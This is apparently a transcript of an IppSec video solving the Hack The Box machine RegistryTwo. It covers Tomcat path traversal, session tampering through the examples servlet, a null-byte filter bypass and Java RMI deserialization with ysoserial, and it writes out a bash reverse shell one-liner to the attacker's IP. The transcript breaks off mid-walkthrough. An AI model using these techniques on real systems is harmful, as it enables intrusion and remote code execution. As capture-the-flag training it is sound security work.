HackTheBox RegistryTwo

IppSec · Beginner · ☁️ DevOps & Cloud · 2y ago

Key Takeaways

The video demonstrates an attack on the RegistryTwo box that exploits misconfigurations in the Docker registry and the RMI service, using tools such as Nmap, curl and a Java decompiler (JD-GUI). The attack involves obtaining a registry auth token, reading the registry catalog, and executing commands via the RMI server.
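The token step the summary mentions, as an added example that is not code from the video or the box: it parses the Bearer challenge a registry returns with its 401, builds the token request URL for the registry:catalog:* scope, and decodes the issued JWT's access claim the way jwt.io would, so a defender can check what an anonymous token is actually granted. The challenge header, hostnames and token are constructed sample values, and the service name "Docker registry" is an assumption.

```python
"""Docker registry v2 token flow: parse the Bearer challenge, build the token
request, and inspect the scopes inside the issued JWT.
Added example; the header, hostnames and token below are constructed samples."""
import base64
import json
import re
from urllib.parse import urlencode

# Constructed 401 challenge of the kind the registry's /v2/ endpoint returns.
SAMPLE_CHALLENGE = 'Bearer realm="https://www.webhosting.htb/auth",service="Docker registry"'


def parse_bearer_challenge(header):
    """Turn 'Bearer realm="...",service="..."' into a dict of its parameters."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "bearer":
        raise ValueError("not a Bearer challenge: %r" % header)
    return dict(re.findall(r'(\w+)="([^"]*)"', params))


def token_request_url(challenge, scope):
    """URL a client fetches to get a token. The registry only supplies realm and
    service; the scope (e.g. 'registry:catalog:*') is chosen by the client."""
    query = {"service": challenge["service"], "scope": scope}
    return challenge["realm"] + "?" + urlencode(query)


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_jwt_claims(token):
    """Read the payload of a JWT without verifying it (what jwt.io shows)."""
    _header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(payload))


def granted_access(token):
    """Map (type, name) -> set of actions from the token's 'access' claim."""
    access = {}
    for entry in decode_jwt_claims(token).get("access", []):
        key = (entry["type"], entry["name"])
        access.setdefault(key, set()).update(entry.get("actions", []))
    return access


def catalog_listable(token):
    """True when the token lets its holder enumerate every repository.
    An auth server that hands this to an unauthenticated client (empty 'sub')
    exposes the registry contents to anyone who can reach it."""
    return "*" in granted_access(token).get(("registry", "catalog"), set())


def make_sample_token(claims):
    """Constructed, unsigned JWT for the demo; a real auth server signs it."""
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    return header + "." + payload + ".sig"


# Constructed token carrying the claims an anonymous catalog request gets back.
SAMPLE_TOKEN = make_sample_token({
    "iss": "Acme auth server", "sub": "", "aud": "Docker registry",
    "access": [{"type": "registry", "name": "catalog", "actions": ["*"]}],
})

if __name__ == "__main__":
    challenge = parse_bearer_challenge(SAMPLE_CHALLENGE)
    print(token_request_url(challenge, "registry:catalog:*"))
    print(granted_access(SAMPLE_TOKEN), catalog_listable(SAMPLE_TOKEN))
```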

Full Transcript

What's going on YouTube, this is IppSec. I'm doing RegistryTwo from Hack The Box, which was an extremely intimidating box because of all the Java you have to exploit, but it was really well put together; each step built upon the last one, so it's really rewarding to complete. It starts off with the typical nginx/Tomcat path traversal with the ..; trick, and you use that not to access the admin or manager interface but to access the examples directory that's there by default. There's a servlet there that lets you modify stuff in your session, and you use that to gain administrator. From there you do some magic, but there is deserialization with ysoserial you have to do; then you have to exploit an RMI listener, and then after that you have to stand up your own RMI server, so when the antivirus thing goes to scan something it pulls a config from your RMI server and you give them a dangerous config that leads to it exfilling a bunch of files to a place you can read. There's a lot of ways to go through this box; I'll try to cover them all, but let's just jump in.

As always, we're going to start off with an nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it registry2, then the IP address of 10.10.11.223. This can take some time to run, so I've already run it. Looking at the results we have quite a few ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTPS on 443; its banner tells us it's nginx, also running on Ubuntu, and it's redirecting us to www.webhosting.htb. Whenever I have a www I also like putting the parent, so webhosting.htb, because I don't want to have to specify www every time. So it redirects us; we have the certificate (Save Free Hosting), and it doesn't look like anything else is in the cert here. On port 5000 we also have HTTPS, and its title says it's a Docker registry API 2.0; its certificate is just *.webhosting.htb.

So let's go ahead and take a look at the site. I'm going to go to https://www.webhosting.htb and we get the page. If we navigate to https://www.webhosting.htb port 5000, let's accept the certificate, we just get a blank page there, and on 5001, let's accept this, we get the Acme auth server. When I actually did the box initially I skipped this whole step on ports 5000 and 5001; I'll show you how to skip it when we get there, but let's go enumerate this now so you see everything this box has to offer. I would start by just googling what Acme auth server is, and we see it's a Docker registry authentication server. So this is the authentication server; if you look more into it you don't understand exactly how it works, it's just a very vanilla thing that you stood up, probably in a really bad configuration, when we look at it deeper. But let's go ahead and look at port 5000. I'm going to do a curl -k https://10.10.11.223:5000. If we just look at the headers here it doesn't really tell us that much; we just have an HTTP/2 200. But if we induce a 404 message, so I'll just do that, we can see we have the Distribution API header, registry 2.0, so this is probably how nmap discovered exactly what its purpose is. If you look more into exactly how the Docker registry works, a lot of it goes under this /v2 directory, and when we access it we get an authentication required, and we can see the header is telling us where to authenticate: it wants us to authenticate to webhosting.htb. I want to grab the catalog, but this is behind authentication, so let's go make a token. This is going to be what I'm talking about: the Docker registry by default is in a horrible configuration; it's more just a development/testing thing, right? This is not meant for prod, just running this vanilla like this, because if I request it I get a token. But this token actually isn't going to work right away; we have to specify some things. So if I specify the header, and it's an Authorization: Bearer token, which most of these tokens are when you get them, it's always Authorization: Bearer for APIs, we just get authentication required.

I can pipe it to jq so it's a bit prettier, and if we wanted to, let's see, I'm going to go to jwt.io and paste this in, because this will show us the token a bit better; we can see what it looks like. It's just, again, a JWT. So what we want to do is specify what service we want, and we want the registry catalog permission so we can access the catalog, and then in the actual header we have the service, so we want two parameters in this auth. You'd have to read all the documentation to understand exactly how this works, but I'm not going to show it since I skipped it. If you want to know, probably check out 0xdf; straight up, he did it this way, so he understands this much better than I do. But if we just specify the parameters, what is it, we want service equal to Docker+registry because we URL encode it, and then what is the next thing, was it component or catalog? I may have to go read the documentation. Anyways, does it tell us? name, catalog, yeah, I'm going to have to go look at the documentation because I forgot the parameter name. So let's go over to google.com and I'm going to google "generating Docker auth token". Let's see, we go here; this looks like it's using the Docker binary, I don't want that. Let's see, curl, this looks better, oh here we go, and scrolling, let's see, requesting a token: so we have service, offline, client ID, scope. Scope is what I want, so I'm going to say I want the scope of registry:catalog:*, I believe, so that will give me the ability to request the catalog, which will show what Docker images are available on the system. We have to put that in single quotes because I have an ampersand. I think we have to do /auth, and that was in the header, right, we have webhosting.htb/auth, I forgot to put that. So we have this token now; let's try this with a new one, so I'm going to go here and then Ctrl+Delete to delete words, I finally have that in my muscle memory. We run it and we can see there is one repository, this hosting-app.

So if we wanted to we could try pulling this. If I do a docker pull, oh wait, is it webhosting.htb port 5000 hosting-app? We have a certificate, and Docker used to have an --insecure-registry option, but that got removed recently, I believe, so we can't just do the equivalent of -k to accept the cert. So we have to tell our OS to accept it. I'm going to download the cert with OpenSSL, so we'll do openssl s_client -showcerts -connect webhosting.htb:5000, and let's see, do we have it? There it is. So I'm going to grab the cert, because this will be the CA certificate, vi registry2.crt, I should do like a -t but oh well, put it there, and actually it's .crt, we'll do ca, there we go. So I'm going to move it into /usr/local/share/ca-certificates and then we want to do an update-ca-certificates command. This is going to take all the certificates we have and put them into our central certificate thing where we trust certificates, I guess, on Linux; I don't know a good way to explain that quickly. But I'm just going to now restart the Docker service, because if I don't, it's not going to pull from the new thing, I believe; I think I have to restart the service, yeah. So let's do sudo service docker restart. I know I probably should use systemctl restart docker, but pretty much the same thing. And now if I do this docker pull it's actually going to work and pull this image down. Once we have this Docker image we will be able to run it, then we could exec into it and start extracting files. What this Docker image is, it's going to be hosting-app, which is the web application here, right? So this is going to pretty much conclude the whole Docker section. I just want this download to complete so I can run it, and then I'm going to forget I ever pulled this Docker image and we proceed like we never did. I'm going to do docker run hosting-app, is it -it sh hosting-app? Let's see, unable to find image; do I have to specify docker images? docker run hosting, I'm going to put this whole thing in; I don't think I need it, yeah I do, okay. So let's close out of this. I can do a docker ps, docker exec -it a926 sh, I just pulled it from here, and now we're in the Docker container. So, awesome; I'm just going to kill this, and then let's proceed like we don't even have knowledge of that.

So we have this web hosting server. We could run gobuster; it's not going to help us, so I've already wasted enough time looking around at that Docker thing, so I'm not going to worry about it. The first thing I like doing is looking at the headers, so if I curl this -v, we need to do a -k, or I can just go to Burp Suite; Burp Suite would probably be better right now. So let's switch over and start using Burp. We have that; let's turn proxy intercept on, refresh this page, get back to Burp, examine the headers, let's see what we have. We have the server as nginx and nothing really else here. So we want to try to identify the underlying technology, and I know we have the Docker image, we could just look at it ourselves, but that spoils the fun, right? So I'm going to look at the registration page and I'm going to register the name, let's do ipsec, root@i.r, password of password, and then we intercept this request, and something sticks out right now: we have a JSESSIONID, so we know this is going to be Java on the back end. If I send this one to Repeater, let's see, what's it say? Does it say anything back? No, we just get JSESSIONID. So we know this is Tomcat behind nginx, and whenever we see that we always think of some type of URL confusion thing. Email's taken because I played it in Repeater, right, so we've already made this; so let's get out of sign up and let's do sign in, come on. So let's do root@i.r, password of password. Knowing this is Tomcat, there is something we could do here. I'm going to send this over into Repeater and we can play with it.

So this weird bug happens because nginx is not going to translate this to up, or nginx, let me think how to say this. Let's go to Orange Tsai, SSRF nginx Tomcat; this will probably be a good query to pull it up. I turn Burp Suite intercept off; it always goes back to this presentation. Let's see, so what exactly is happening here? Again, I'm pretty sure when we send this, nginx doesn't treat this as up one directory, but Tomcat does, because Tomcat's pretty much going to strip off the semicolon, I believe. I bet if you go to ippsec.rocks, let's say Tomcat nginx, I would look at this video, because I probably go into that much more in depth the first time I cover things; I tend to remember them better because I spend a lot more time researching it, but now I kind of just take it for granted. When I see Tomcat I play with this. So if we make a request to period, we get a 302; two dots, we get a 404; two dots and a slash, we go back to hosting. If we put this here, we just get blank; that's completely different, and that indicates that this is vulnerable, right? So we have again 404, that is 404 as well, let's see, do this up one directory, huh, I don't know why it was blank there, maybe it just took a long time to respond. But if we wanted to we could dirbust this thing. This is where you normally go to /admin and hope the admin is exposed; manager is another common one, and we can see that is redirecting us to manager/html and then we get an unauthorized. So we need to get some type of credentials here; I believe it can also be locked to IP address, maybe, I don't know, but that is one place we can access. There's another one that's in a lot of bug bounties, which is examples, and we can see that redirects us here. So we want to keep in mind we'll be able to access this examples page, right? So if I went there, we go to webhosting.htb/..;/examples/ and make sure you put the trailing slash on it. There's a servlet example, and in this is a very, very dangerous one: the sessions one, and this will let us modify the session.

We can see our current session says our username is ipsec and this is our UUID. So if we start playing in this application, if I go to domains, create new, let's just do "please subscribe", I refresh my session, nothing really changes there. But if I go into this edit button then something's going to get added to my session and we'll be able to see that here; see, we see the variable s editing media. So since this is added to my session, it lets me edit it in this examples thing, and this is why examples is a very dangerous directory to include. A lot of the previous Hack The Box machines, we always could just go to admin or manager and upload a WAR file and get code execution that way. This is a little bit more difficult because those are blacklisted; a lot of places now don't allow loading that, but the examples directory is still there and we can do really cool things by editing our session, right? So we can see this is pointed at this file. If I go here, that file is going to be this. So if I just pointed this to, let's say, /etc/passwd, submit the query, then I'm going to refresh this page and we have the passwd of the server. So we have a pretty cool LFI here, right? Let's go and edit this to be /proc/self/cmdline and then I'm going to refresh; we can see the command line of our process. So I'm going to look at this, so vi cmdline, let's, oops, paste it; like, copy, the whole thing is only copying because there's a null byte or something, that's weird. So let's just look at this: we got the Java app, then we have a logging config, and we could include this and that's going to tell us how the application's logging. I guess we can, I normally don't look at logging.properties, I normally just do defaults, but it doesn't really give us that much. We know /usr/local/tomcat is the location, but I'm going to change my session; let's now include this logging file, logging.properties, because this may make it a little bit more intuitive. 74 lines, so we can see logging is going to go to /logs/catalina, 90 days. I'm looking for the file format, maybe, because it's 90 days; let's see. If my rambling doesn't make sense here, it probably will in just a second. What we want to get is the name of the WAR file, and the WAR file is, think like a JAR file in Java but it's for web, so it's just a zip of a bunch of Java EE things. Enumerating the processes won't ever leak the WAR name; the best way is to get the Catalina logs, which is just what, I don't know what Catalina exactly means in terms of Tomcat, but the Catalina logs are what you're after. So I think from here we can determine that logs are daily, so either it's going to be in, let's see, let's go back here. You'll either want to go, was it /usr/local/tomcat is where we saw the config, it would be logs/catalina.out is one location, and then it can also be catalina. and then the log name, and the format is normally, I want to say 2024, that'd be year, and then month would be a one, and then day, today is the 31st I believe. I think it's .log when it's specified this way, and there may be a dash here. Can I just google this? google.com, Catalina log file name, year year year, let's see, does it tell us? catalina.YYYY-MM-DD, I think that's the format. So let's try grabbing today's Catalina log. If I submit that, we refresh this, please say some lines; we have three lines, so that did not work. Let's see, what could the log be? Oh, it's not periods between the days, it's dashes, right; if I go over here, there we go, dash dash, so that was probably my issue. Going to submit the query, refresh, don't say three lines, there we go, 388 lines. So this is going to be the Catalina log, right; it's not the Catalina Wine Mixer, it's the log. So I'm just going to search for war, because what I want is WAR files; we see deployment of the web application archive /usr/local/tomcat/webapps/hosting.war. Normally I also try to grab EAR files, I forget exactly what these are, but it's another thing that's common on Tomcat. This doesn't have it; we just have a WAR file, so we just want to grab this one.

So I'm going to go back into my session, we'll do s and then grab this and submit the query. So now this file disclosure vulnerability should leak the WAR file, and since this is going to be a zip it's going to be huge. I'm going to send it to Repeater real quick, let's copy, I did this so I can right click to copy as a curl item, because when I forward this it's going to be hard to copy out of this window, right, and I hate doing the view source thing because the browser is going to get all wonky. So, let's, I don't know what file I was in, cmdline, okay, let's paste the curl line; I'm going to do -o and I'm going to call this temp.out real quick, so it's going to download that. We can see this is still trying to load, oh, probably because I've intercept on. 22 megs, 18,000 lines, and it's going to be printing pretty awful, so, oh shoot, I should not have closed that actually, oh well, I think we are done with that one for a second because we have the file saved. So if I do vi temp.out we can start carving this file, and one helpful thing when you have a huge file that's going to spam a lot of lines is turn your syntax highlighting off, so :syntax off, and I'm just going to delete until we see the file, and it's going to be apparent because that huge base64 blob is the file. So let's delete everything up to that line, and I'm going slow around it because every now and then it still will be clunky since this file is so big, or this line. So delete, delete like that, I accidentally deleted one too many, there we go. And I'm going to hit the dollar sign to go to the end of the line, and then it's going to take a hot second for it to go to the end, and one two three x's, is it going to delete, come on, there we go, I deleted one, delete that; maybe I should have went into insert mode and deleted. I don't know why this is taking so long. I think we're good; I did not see exactly what it did, I blinked and it disappeared. I think there's another option to disable fancy redraw or something on Vim, because I think it's having a hard time positioning that whole line. I'm going to hit up again, I want to see, it still has two equals, has one equal, I gave it a second equal I think, and then I think it has to redraw this whole line. Vim disable redraw, is that it? Let's see, I forget the exact function, but I think we have it. So let me delete everything, let's save it, base64 -d temp.out, fix that command, and I'll call it hosting.war. We don't have any error messages, and if I do a file against hosting.war we have a JAR archive. So that is the other way to get this; the intended way, again, boot up that Docker image that we had done and then spin it up, extract the file out of there, but I think it's funner just to do the file disclosure vulnerability like we showed.

Having access to this WAR file, we want to decompile it, and to do that I'm going to grab JD-GUI. I'm going to go to Google, we'll do JD-GUI, and that's going to let us open this and view all the good source code of it, right? So I'm going to go to download, download that version, let's stick it in htb/registry2 and I'm going to call it jd-gui.jar, and let's see, I'm going to make a directory bin; I'm going to move all the files I like using into this directory because there's going to be a few other apps we just get. So I'm going to do java -jar jd-gui to load this up, and then let's do File, Open File, up one directory, hosting.war, and let's see, is there a config? I don't see a config to make this font bigger. Oh sweet, I can just do Ctrl, sweet. So having access to source code, I'm going to go into WEB-INF/classes/htb/hosting and this is going to be where all the code is. I'm going to expand all these so we can look at them, and then where do we want to start? Constants is normally a good thing; you can see all the constants in a file, and we can see the variables like s is user role manager. We didn't see this one, but having access to that examples, we can set our role, which would be pretty cool. Let's see other things we can do. If we go to the authentication servlet, that's another place I would start; you can see when you log in we have a validate, we set the login UUID, displayed username, and then we get the role, and then we also will set this "is logged in role manager". Another thing, let's see, I don't know a good way to do this in JD-GUI; if we went to some servlets we could see like this WebServlet, right? I don't know if there's a good just search option; let's do @Web, we serve, do we see, yeah, I don't. So what I'm going to try to do, let's Save All Sources, I'm going to save it here and then I'm going to open it up in VS Code, or we can just grep it, because I want to see all URL endpoints, and it drives me crazy I can't find a router file that I'm used to in any other web language that just has a list of all the routes; they like doing this WebServlet thing here, so that drives me crazy, but this is my workaround, right? So, make source, let's go in here, I'm going to unzip the hosting.war source zip, I'm going to make a directory called hosting, move everything into it, because we're probably going to have source of other things, right, and now I can just do a grep command since I have all the source code. Let's just do grep -ri WebServlet, is that going to work? Let's see, WebServlet comma, or parentheses name, there we go. So this will tell us a list of pretty much all the routes: we have auth, signin, autosave, reconfigure, panels, domains, edit, logout, profile, all, signup and view. Reconfigure is one we haven't seen, so if we look at this, that's in the ConfigurationServlet.java, so we can go here, look at reconfigure, and let's see, we do a GET, it's going to do this check manager thing; if we click on check manager it again wants this "is logged in role manager". So what we want to do is set this attribute for us. I'm going to go back into the session example and let's go back to the webhosting panel; wonder if we have to, we won't have to re-log in because it's setting the session. We can see right now we have that; I'm going to set this user logged in manager to true, submit, and now I have that session and we have a new field, configuration, and then reconfigure. So we can reconfigure something here: we have max domains five, we could change that, we can change the index template, but if we look we can actually set any parameter, so it's kind of like a mass assignment thing here, because if we go back here and save this, let's turn intercept on, we submit, we can see we set these two variables, right? But if we look at the code, what it's doing is it's just getting any parameter we send, putting them in this map and then updating them. Oh God, I did not mean to click settings, there we go.

So since we can edit any setting, we could also edit what the server uses to talk to. There is MySQL somewhere here, but getting code execution through MySQL, it is possible but it is much, much more challenging. I like using RMI wherever I can, and we see there is a variable here to set rmi.host, and we see it does check when it loads this: if rmi host contains .htb then, or if it doesn't contain htb, then it's going to set it this way. However, if we put a null byte here we can include htb, but when it uses RMI, like the actual host, it gets terminated; it's just like PHP, right? So what we're going to do is set rmi.host and we're going to point it back at us and then put a null byte in and then htb, so that way it passes this check, but when it goes to connect it gets terminated at the dot and goes to our IP address. So this is going to be the much easier way to exploit this. Let's take a look; I'm going to do nc -lvnp, what port does it connect to? It looks like 9002. Default RMI is 1099, I believe, and this is just a mapper port, so you connect to the RMI port, it tells you where to go to after that; we'll probably cover that later on this video, but the mapper is set to 9002 for whatever reason. Thankfully they don't do 9001 and just take my reverse shell port, kudos to the author for not doing that, but yeah, let's see. We want to set the rmi host, so what I'm going to do is we'll do an ampersand and then rmi.host is equal to 10.10.14.8, and I guess we can do this first without the null byte, right? So if I did that, and then let's turn this, oh hold on, I'm going to drop that request; if I did that in the Repeater tab and then forwarded it, it would have deleted it. So I'm just going to turn Burp Suite off real quick because we no longer need it for now. If I refresh here, we can go domains, click around, I never get a callback, because again that if-then is getting checked and it's resetting it to the htb value. But now I'm going to turn to Repeater, I'm going to do a null byte .htb, we're going to send it. So now we have updated it to set rmi.host equal to our IP, and then I'm going to refresh this page, maybe we have to click index. I could have sworn I was waiting for a connection; see, what did I do wrong? So we set 10.10.14.8, that is my IP address, nc -lvnp 1099, I'm going to listen on that for good measure; maybe I just need the null byte and don't do htb. Let's see, what am I missing? We set domains and rmi.host, let's see, class rmi.host, I believe that's correct. Let's just append the htb again and try this again. So we send this, we ought to match, I am listening on 9002, see, let's go back, there we go. I am not sure what happened before, but now we actually error whenever we try something; maybe that's when we view a file, right, but now we're getting a connection back to us on this interface.

So what we can do is now perform a deserialization attack, and a lot of people at this point use ysoserial, and I am going to, but one thing I really like nowadays, I know the library is going to be a bit older because it hasn't been updated, you've got the default ysoserial, but when doing RMI exploitation quite a while ago, I forget what exploit made it popular, maybe it wasn't RMI, maybe it was Log4j, I found this ysoserial-modified library that I absolutely love, and the whole difference is this will allow us to do shell redirection. They explain it pretty well in this whole description: the default ysoserial has the exec running like this, and when you do it this way you can't really do any type of redirection, which sucks, because if you want to do a one-line shell you just can't, or you can but you have to do a lot of weird escaping, maybe. It's not easy to do a one-line shell in the regular version of ysoserial. What they essentially change it to is like this: we put the /bin/bash or /bin/sh in front of it, -c, and then the command. If your container doesn't have /bin/sh, so if it's like a Docker scratch container that's mainly used in Golang applications, you're out of luck, but I don't know many people that use Docker scratch, so almost always you're going to have a /bin/sh, and then the command is done this way, so now all the redirection works just fine; you don't have to worry about escaping and things like that. So that's why I'm using this ysoserial-modified. Now the painful thing is there's no exact release and getting this to run isn't the easiest, so we're going to go to this pull request and they have a Dockerfile, so I'm going to pull it from haters repository, and there are going to be even some changes to this one because I guess libraries updated or something, so we'll go make all those changes. I'm just going to do a git pull on this one, right, yeah, git clone, not pull, and then we can go into ysoserial-modified, and then if we do, was it docker build . -t, I'm going to name it ysoserial. It's going to pull all the containers down and then when it tries to build I'm 90% sure it's going to fail, and there are going to be two small changes we have to make, so I'm going to speed up the video so you don't watch it extract all this and we'll get to the error message. And we have the first error: we have could not find artifact javax.interceptor stuff 3.1. If we google this error, let's see, it's going to tell us we should use 1.2 as the spec instead of 3.1, so we want to find this. Where is this file? I think this is in pom.xml, maybe, yeah, so vi pom.xml, 3.1, maybe, interceptor API, this one, and change 3.1 to, we said 1.2, right, 1.2, saved, and that was -api. So now with that changed we're going to build it and it's going to error again, and the next error is going to be related to the Java version, because I think the Java that's in this Docker image isn't really supported anymore, so it's not on the Docker Hub, and the thing we're going to do is change it to use OpenJDK. The reason why we're just not going to update Java to the latest is there's a bunch of issues on ysoserial of it just not working with the latest version of Java; I don't know exactly where those issues are so I can't pull them up, but take my word for it, you want to use an old version of Java with ysoserial. So I'm going to let this finish, we're going to zip to the end to where the error message is, and here we go, step 10 out of 13, we have an error: it says FROM java:8-jdk-alpine, it can't find it, and the reason why, again, is this is an old container, so it got deprecated. The answer is not a great one, because we're going to replace java with openjdk, and I say it's not a great one because this repository is also deprecated. So let's rebuild this and it should build relatively quickly, but the best answer would probably be finding the latest version of Java that ysoserial supports and switching it to use that one, if that's not removed from the Docker registry, but this gets us to where we're working, right?

So we have successfully built it and tagged it, so I can do a docker run and then ysoserial, and we see the output. For this we actually want to use this in a different mode, and by that, let's see, a good way to explain this: the entrypoint we're doing is java -jar ysoserial, and that's just going to execute and hit the main function, which doesn't give us the ability to just execute a call in the jar. So we want to execute it with -cp, which lets us execute specific functions in this that are not exposed to main. So what I'm going to do is find out how to exit Vim, no joke intended, and then let's see, we're going to do that docker run, I think it's a dash entry, I think it's dash point as well, sh, and maybe it's just one thing, --entrypoint probably goes before ysoserial, and we probably want to run it in interactive mode; unknown flag, there we go. So now I'm in just the app, so I can do a java -cp, and before I do that we want to map a port here, so I'm going to do -p 9002:9002. What this is going to do is map 9002 on my host to 9002 in this container. So now we can do java -cp ysoserial.jar and then, I don't know a good way to know this other than just reading blog posts or knowing what's in it, but we're going to specify the function called ysoserial.exploit.JRMPListener and we'll do 9002, and then we can specify one of the Commons Collections; those are super common in Java, so we'll do CommonsCollections6. Five works as well; I'm sure we could look through the source code and then look at the import statements and figure out exactly which one to use, but I like just using five or six, I find them relatively reliable. And then this next one is a ysoserial-modified-ism; I think this is going to be terminal type, it supports bash, PowerShell and cmd, I want to say it's just how it executes. If you go to the man page on ysoserial-modified you'd find out, but if you're on Linux you probably want bash; if you're on Windows you want PowerShell, probably, right? And now we can do our one-liner, so we can do bash -i >& /dev/tcp/10.10.14.8/9001 0>&1, like this. So when I run this we have started the listener, so let's start on 9001, and then I'm going to refresh this page just so we have the RMI host definitely set. We go back here, I'm going to refresh, and we have to log in again, and then I'm probably going to have to set that again; I'm guessing my cookie is invalid, so I edited the whole session here, I reconfigured it for this JSESSIONID I'm guessing, so I have to probably re-edit or grab a new cookie. So let's just go to Burp Suite and turn intercept on, refresh, grab this cookie, go to Repeater, paste this in, send it, uh oh, we're getting a 302, oh, because we have to, let's see, do we edit, we have to give ourselves admin again, right? So let's do examples, servlet, sessions, and then logged on user role manager set to true. So now we have that, send, no longer a 302, go to hosting, it's hanging; we see here we got a connection, read the message, sent, and down here we have a shell.

So I'm going to run python3 -c 'import pty; pty.spawn("/bin/bash")', no Python; do we have script? We don't, so we can't actually establish a proper PTY, which kind of sucks. I wonder if I can export TERM to xterm and still clear the screen; I can't. So that is how we get a shell on this container, and I know it's a container because if we do ls -la on / we have .dockerenv. What this is going to enable us to do is interact with the host, so netstat -lntp, we can see there's various ports. The really weird thing here is we have host networking enabled in a Docker container, because we see we're in a Docker environment; if I do an ip address we can see we're sharing the same network as the host, so we can access anything. But I'm going to get out of the shell because we actually could skip this step; I didn't really talk about it before, but this whole step could also be skipped, and the whole reason it could be skipped is just IPv6. The next step here is going to be interacting with the RMI service itself to get a shell, but we couldn't do that from our host because it's firewalled off, right? We don't have access to hit just port 9002, so if I do nc 10.10.11.223 9002 -zv it doesn't connect, and we need to be able to hit that port. There's also probably a high-number port we'll need to hit, 3449 in this case, but we can't hit either of those because of the firewall. But IPv6 we could, so how do we get IPv6? Well, in the proc directory, this is where all tools like ifconfig, ip and stuff pull information from, right? I think it's in net as well; let's see, there should be, I'm going to grep for six, if_inet6 I want to say is the file, so we have it here. This is going to be the IPv6 address; we can see the address, the interface, right? So I know I grabbed this from the Docker container, so if I wanted to, we could actually grab it from the hosting panel, right? So I'm going to get rid of this rmi host so we're not sending it all the time, we go back into the hosting panel, /hosting, okay, that's fine, we go back to our domains, we start editing something, so I'm going to go edit, we go back here to the session and we're going to go editing mode, and then we can say /proc/net/if_inet6, was it if_inet6, if_inet6, submit, refresh this page, and then we have it. So from this we could actually now just hit those ports. Let's go back over to where we are trying to do netcats, so let's try 34409 first, right, that fails, but if we do the same thing and add a -6 and then put a port, we have to put the colon, so we can do a colon there, colon there, and I know we can simplify the IP address because of all those zeros, which we will do in a second, but there is a colon every four. So we do that and, wonder if it changed ports on me, let's do 9002, there we go, so that does change ports. We go back to this one, 9002, we see it doesn't work. If we wanted to, we could also simplify this, so you get rid of the zeros, do a double colon; you can only do this once in an IPv6 address, but we do that and it also works. So this is how we could just access the box, the sensitive ports directly, because the iptables rule only applied to IPv4 and they didn't apply it to IPv6, which is a somewhat common misconfiguration. I mean, I think I've shown this before; it's on one of my favorite boxes, Sneaky. Let's see, IPv6, we haven't done it much, but yeah, we talk about it quite a bit, and Sneaky was the first box I found it in, and this goes into some things that I learned doing this box. I clicked it because I want to know when this was, right, because this box was just released and this was six years ago, so again the misconfiguration can happen quite often. So let's see, now that we have that port, let's talk about why that port is sensitive and what we're going to
do next so let's go back to the source code and it's a bit pain to search this so I'm going to go and open Visual Studio code again so Source uh hosting is I think where it was open up vs code it's going to take a second to up open but we just exploited this piece of code right there is actual stuff it's doing in RMI and if we actually communicate to the RMI server we'll be able to potentially run commands if the commands not ran on the docker if they're ran on the host then we can escape the docker this way right so we want to examine more about the RMI so let's see where are we so in the file service it's listing a bunch of functions so we can upload file delete create directory get file delete domain new domain and in the case of domain it's talking about the um host that we make uh let's see so if I go back to hosting it's probably going to want me to log in and I can disable burp just so it goes a little bit faster so we'll log back into this and we have a domain thing here so this is what it's talking about domain and this number right here string is going to be the uid or the vhost but we have all these functions that we can call um let's see was something I wanted to show this is the piece of decompiled code we're looking for string is htb registry going here but let's see let's just search for um upload file and see where this is used so we do find and file upload file and if we go to The Domain seret we can see it's very clear exactly what what this is doing because we have the RMI client it's going to upload the file the domain get virtual host and then upload index. 
HTML this is parameter one and this is parameter 2 right so we have pram string one we could say Vost and this one will be file and then you have bytes which is the actual file so I'm going to add undo the two edits I did because I don't want to change this Source too much because it may just break things but if we go to this one we can see again how to call it What fields we need um the first argument is going to be the vhost then we give it the um file name and I bet if I scroll over here it's doing a string to get the start template and that is um probably let's see this right so we should be able to just um upload any file we want or do any other command so let's get started by making this and the first thing I want to do is fix this package thing because we have this web imp classes come and we don't want that all over a code so I'm going to copy this and we can say replace in files and we'll replace that with nothing okay so now this looks more like a standard um library and we will let's see I'm going to close visual studio and then go into the classes directory and open up so let's go web imp classes and I can go here and then we can make a exploit. 
Java and start off our code so I'm going to create um public class let's see all the Java names capital I forget casing we should put a capital E here um standard Java thing I think the file name starts with a capital we can say exploit like that and we want to make a main function so I'm going to do public static void main then we can say string pergs and print out hello world run and there we go we have it so the one thing I do want to do is have the ability to change the vhost because that is going to change pretty often I believe if I go back here that's going to be this string so it's a bit of a pain to do arguments when you just click run like I did so I'm going to have it default to um this variable so we'll say vhost is equal to this and then I can say um if AR's length is greater or equal to one then vhost is equal to the first argument so now that lets us um change it for when we um um run this on the command line so now that we have that we probably want to connect to RMI so let's see if we do RMI client wrapper we just did this get let's see how does it work or my host 90002 connecting I think we could just call this right let's try this so I want to import Comm htb hosting RMI RMI client rapper and then I'm going to say um what is the variable it's a file service so maybe SV uh file service SVC is equal to this does that work uh cannot be resolved to a type so we got to import that file like that and that just the value of local variables is not used so that's just tell me service is not used so now if I do like a service dot um we have all the functions so let's do list right and I'm going to say one two three four five yeah that's fine oh that's going to be a file we want a directory so if I just specify this uh what is is this ering unhandled exception try catch print stack Trace there we go and we have to um have this returned to something right because we're just running this function um this is a list abstract file so we can say list abstract 
file um what do we want to call this files that sounds fine and then we Loop it and get the name let's see what this does if we run it is trying to grab Etsy hosting do let's see hosting ini find and files so it's got a config file I don't know if we want to do it this way then let's see you can probably hardcode it so public static file service get let's create our own function see wish my auto andent thing was working this has to be in dented that's better that goes there there there awesome so I'm going to call this connect RMI I guess and we'll pass a two variables we'll say do we say strings first name and Port like that method must return the result of a type maybe we just have to return so let's see we have this we want to connect to the [Music] registry like that let see I'm just doing what it did here right and then they return this unhandled exception throws exception there we go so I think we have something similar to what they did let's just say connect RMI and then remote registry htb Port 90002 does this work uh always continue compilation I got a semicolon somewhere have it have it there we go see this is a TCP error so what we're going to do is we're going to get this working through IPv6 first because it's just easier and quicker for the video and then we're going to show um doing it through the socks proxy which I think was the intended way because the whole IPv6 thing is uned so let's go where is the IP address there it is let us grab e zero dead beef grab this okay and then we can connect to IPv6 run what still getting registry run let's run in debug mode step 